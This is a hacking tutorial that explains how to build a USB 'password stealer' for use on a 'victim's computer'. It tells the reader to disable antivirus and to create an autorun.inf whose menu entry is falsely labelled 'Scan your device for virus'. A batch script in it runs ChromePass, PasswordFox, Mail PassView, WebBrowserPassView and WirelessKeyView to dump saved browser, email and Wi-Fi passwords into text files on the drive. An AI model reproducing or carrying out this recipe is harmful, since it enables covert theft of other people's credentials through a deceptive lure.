In this article I will explain you on how to make a USB password stealer and steal saved passwords.
Now be ready to create your own USB password stealer.
Before going to start download following tools :-
- ChromePass:-ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser
- Password Fox :- PasswordFox is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Mozilla Firefox Web browser.
- Mail PassView:-Recovers the passwords of the email programs( i.e gmail,yahoo,Outllok Express etc).
- WebBrowser PassView:- WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 – 8.0), Mozilla Firefox (All Versions), Google Chrome, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser. After retrieving your lost passwords, you can save them into text/html/csv/xml file, by using the ‘Save Selected Items’ option (Ctrl+S).
- WirelessKeyView:-WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer
You can find these and many more tool here .
Note: Kindly disable your antivirus before performing these steps.
Now Follow these steps:-
1. extract the files you downloaded to your desktop and copy all the .exe files to your USB
2. Create a new Notepad file and write the following text into it:
ACTION= Scan your device for virus
Save the Notepad as autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following code onto it.
start ChromePass.exe /stext ChromePass.txt
start mailpv.exe /stext mailpv.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start PasswordFox.exe /stext passwordfox.txt
save the notepad file as “run.bat”.
Copy the run.bat file also to your USB drive.
Now your USB password stealer is ready. All you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Scan your device for virus) as soon as you will click it, your USB password stealer will do it’s magic and all the passwords saved on the system will be saved in a respective .txt file.
1. this only recovers passwords that have once been saved on your computer
2. note that the computer should not have autorun feature disabled for the USB stealer to work.
in that case Manualy open launch .bat and it should work.